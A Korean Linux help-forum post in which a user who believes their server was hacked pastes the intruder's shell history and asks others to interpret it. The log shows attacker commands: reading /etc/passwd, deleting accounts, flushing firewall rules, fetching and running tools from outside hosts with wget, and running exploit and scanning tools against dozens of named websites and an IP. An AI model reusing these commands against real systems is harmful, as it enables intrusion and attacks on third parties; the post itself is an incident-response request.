질문&답변
클라우드/리눅스에 관한 질문과 답변을 주고 받는 곳입니다.

 

리눅스 분류

해킹을 당한것 같습니다. 봐주시면 감사하겠습니다.

작성자 정보

  • andy 작성
  • 작성일

컨텐츠 정보

본문

침입자가 한 내용

즉 .bash_history 내용입니다.

뭘 하고 갔는지 초보라서...

보시고 고수님들의 답변을 부탁드립니다.

killall -9 probind
ps -ax
uname -a
/sbin/ifgonfig
/sbin/ifconfig
ls -a
ls -all
cat .bash_logout
cat .bash_profile
ls
pico
cat /etc/passwd
locate pico
ls
w
id
netstats
netstat
ping yahoo.com
cd /var/tmp
ls
cd /tmp
ls
rm -fr probind
ls
cd .ssh
ls
rm -fr prt
cd /var/tmp
wget roman-hackers.org/prt
chmod +x prt
ls
ps -ax
ls -all
cat /etc/issue
w
exit
cd /home/angel
ls
cat/etc/passwd
cat /etc/passwd
exit
ls
cd /home/angel
ls
cat /etcf/passwd
cat /etc/passwd
userdel -r swq
/usr/sbin/deluser swq
deluser -r swq
userdel -r swq
/usr/sbin/userdel -r swq
cat /etc/passwd
ls
su vms
ls
passwd
ls
w
ls
cd /home/angel
ls
wget justus.go.ro/php.tar
tar xvf php.tar
cd k
./try vampix.com
./fun -t2 www.bk21.or.kr home_print/home002.php  -s bffff038
./fun -t2 www.bk21.or.kr home_print/home002.php  -s bffff038
./fun -t2 www.bk21.or.kr home_print/home002.php  -s bffff038
./fun -t2 www.bk21.or.kr home_print/home002.php  -s bffff038
./fun -t2 www.kibs.or.kr book.php -s bffff948
./fun -t2 www.kibs.or.kr book.php -s bffff948
./fun -t2 www.kibs.or.kr book.php
ls
./fun -t2 www.bk21.or.kr home_print/home002.php  -s bffff038
./fun -t2 www.bk21.or.kr home_print/home002.php
/sbin/ipchains --flush
./.try www.bhcc.mass.edu
./try www.bhcc.mass.edu
./try www.radioworld.ca
./try www.tuvalu.tv
./try pcshop.ic.cz
./try ic2.epfl.ch
./try www.ic.cz
./try www.internetnews.com
./try union.ic.ac.uk
./try www.rozhodni.sk
./try www.indexcopernicus.com
./try odinmp.imit.kth.se
./try www.cleopatra-groningen.nl
./try www.cleopatra-groningen.nl
./try www.ic.ucsb.edu
./try pinduca.ic.unicamp.br
./try www.ic-ent.com
./try queen.ic.cz
./try www.acceleratedtechnology.com.tw
./try www.ic975.com
./try www.gigaparts.com
./try www.ithaca.edu
./try ssb.auvicom.nl
./try by.ic.cz
./try archives.postgresql.org
./try www.tuvalu.tv
./try www.crm2day.com
./try www.sopac.org
./try www.nukeforums.com
./try www.bosnia-talk.de
./try ruleit.co.uk
./try www.miguelo.org
./try phpnuke-dir.org
./try www.reiter-seiten.de
./try www.idearium.it
./try phpnuke-dutch.org
./try phpscript.host.sk
./try lovemorgue.org
./try www.nukezine.com
./try www.nukestyles.com
./try www.smartpc.nl
./try www.railpage.org.au
./try movingparts.net
./try www.vr2003.org
./try museums.di.uoa.gr
./try www.antionline.com
./try www.dreamlandpark.com
./try www.iti.gr
./try www.spiraline.com
./try www.reddingsbrigade-culemborg.nl
./try forum.computer.lviv.ua
./try www.netprofessional.nl
./try www.vrjuggler.org
./try www.viphost.org
./try www.vr-masters.de
./try www.osnews.com
./try ffspirit.hofyland.cz
./try www.vrseattle.com
./try flarkportaal.hersenfloss.nl
./try www.vanderrhodes.com
./try www.uni-bonn.de
exit
cd /home/angel
ls
wget www.angelhappy.as.ro/selena.tar.gz
ftp www.as.ro
bye
ftp www.as.ro
bye
wget
wget www.kid.tripod.com/selena.tar.gz
wget www.angelhappy.as.ro/selena.tar.gz
wget meke.home.ro/selena.tar.gz
tar zxvf selena.tar.gz
cd selena
./ssx
cd ..
ls
rm -fr selena  selena.tar.gz
wget justus.go.ro/smth
ls
rm -fr smth
wget justus.go.ro/smth
chmod +x smth
./smth 81.18.69.3 110 nasa.gov&
./smth 81.18.69.3 110 nasa.gov&
./smth 81.18.69.3 110 nasa.gov&
./smth 81.18.69.3 80 nasa.gov&
killall -9 smth
killall -9 smth
killall -9 smth
ps ax
w
exit
cd /home/angel;
ls
ls
ls
./fun -t2 www.skypoint.com services/personal.php -s bffff8ac
cd k
./fun -t2 www.skypoint.com services/personal.php -s bffff8a
./fun -t2 www.skypoint.com services/personal.php -s  0bffff32
./fun -t2 www.skypoint.com services /personal.php -s bffff22
./fun -t2 www.skypoint.com services personal.php -s bffff22
./trry www.skypoint.com
./try www.skypoint.com
exit
cd /home/angel
ls
cat /etc/passwd
su lp
cd
su adm
su petty
uname -a
netstat
ps -ax
exit
cd /home/angel
ls
cd k
./try www.dialtone.com
./try gallery.menalto.com
./try www.i-sis.org.uk
./try www.mandrakebizcases.com
./fun -t2 www.mandrakebizcases.com modules.php

관련자료

댓글 0
등록된 댓글이 없습니다.

 

공지사항


뉴스광장


  • 전체 회원수 59,615 명
  • 전체 게시물 32,170 개
  • 전체 댓글수 11,911 개